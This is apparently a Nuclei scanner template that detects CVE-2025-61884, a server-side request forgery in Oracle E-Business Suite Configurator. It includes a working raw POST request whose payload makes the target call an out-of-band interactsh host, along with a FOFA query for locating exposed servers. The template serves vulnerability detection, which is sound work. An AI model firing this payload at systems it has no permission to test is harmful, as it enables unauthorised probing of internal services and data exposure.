id: CVE-2025-61884 info: name: Oracle E-Business Suite - Server-Side Request Forgery author: Kazgangap severity: high description: | Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. impact: | Unauthenticated attackers can force the Configurator server to make requests to arbitrary URLs, potentially exposing internal services and sensitive data. remediation: | Apply the Oracle security patches as described in the Oracle security alert for E-Business Suite. reference: - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884 - https://nvd.nist.gov/vuln/detail/CVE-2025-61884 - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html - https://arcticwolf.com/resources/blog/cve-2025-61884/ - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-61884 cwe-id: CWE-918 epss-score: 0.51081 epss-percentile: 0.97922 cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: title="E-Business Suite" tags: cve,cve2025,oracle,e-business,kev,vkev http: - raw: - | POST /OA_HTML/configurator/UiServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded redirectFromJsp=1&getUiType= {{to_lower(rand_text_alpha(6))}} http://{{interactsh-url}} 0 0 Applet matchers: - type: dsl dsl: - 'contains_all(body, "valid_configuration","terminate")' - 'contains(interactsh_protocol, "dns")' condition: and # digest: 4b0a00483046022100c6d41a30b8f2d6ad7df690254b35219df3288a6d468a2117fb2a13433c0e9f5b022100e1b5f2337aafa4d9bb6d2990d4df0bd003afd50d5eb15deb500f02e6f68d2e9a:922c64590222798bb761d5b6d8e72950